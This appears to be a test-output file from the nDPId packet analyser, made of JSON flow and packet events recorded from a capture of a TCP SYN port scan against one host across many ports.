-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsF98AACkGB5SsEAAIQA2GNIzTGAzdU4MZAAAAAGACCAAYgAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsgIEAADEGlvGsEAAIQA2GNIzTxHzdU4MZAAAAAGACCABsDwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsTM8AADIGyaOsEAAIQA2GNIzTF+DdU4MZAAAAAGACDAAUrAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsGXIAACoGBQGsEAAIQA2GNIzTHvHdU4MZAAAAAGACDAANmwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsL2kAADAG6QmsEAAIQA2GNIzTAsrdU4MZAAAAAGACBAAxwgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAszLEAACsGUMGsEAAIQA2GNIzTE4jdU4MZAAAAAGACEAAVBAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MEAADkGMrGsEAAIQA2GNIzTIZjdU4MZAAAAAGACCAAO9AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsA1UAADsGCh6sEAAIQA2GNIzTGgzdU4MZAAAAAGACEAAOgAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs5vMAADIGL3+sEAAIQA2GNIzTBEzdU4MZAAAAAGACDAAoQAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsVVQAADoGuR6sEAAIQA2GNIzTFGbdU4MZAAAAAGACDAAYJgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs6cgAAC8GL6qsEAAIQA2GNIzTB7PdU4MZAAAAAGACEAAg2QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNgAACcGxJqsEAAIQA2GNIzSBd3dUoMYAAAAAGACEAAisgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsT+AAADQGxJKsEAAIQA2GNIzSCirdUoMYAAAAAGACBAAqZQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAshDcAACsGmTusEAAIQA2GNIzSBIvdUoMYAAAAAGACEAAkBAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsO+EAACwG4JGsEAAIQA2GNIzSBBXdUoMYAAAAAGACBAAwegAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs79wAADMGJZasEAAIQA2GNIzSAGrdUoMYAAAAAGACEAAoJQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsp8sAACsGdaesEAAIQA2GNIzSBCXdUoMYAAAAAGACEAAkagAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsa5sAADsGodesEAAIQA2GNIzSB7TdUoMYAAAAAGACEAAg2wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs0yUAACsGSk2sEAAIQA2GNIzSDtjdUoMYAAAAAGACEAAZtwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsPsoAACgG4aisEAAIQA2GNIzSBGTdUoMYAAAAAGACBAAwKwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsjmsAACkGkQesEAAIQA2GNIzSaXjdUoMYAAAAAGACCADHFgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUoAAC0GBimsEAAIQA2GNIzSFajdUoMYAAAAAGACCAAa5wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsgfEAADMGk4GsEAAIQA2GNIzSG3HdUoMYAAAAAGACEAANHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs3ikAADgGMkmsEAAIQA2GNIzSDd\/dUoMYAAAAAGACBAAmsAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 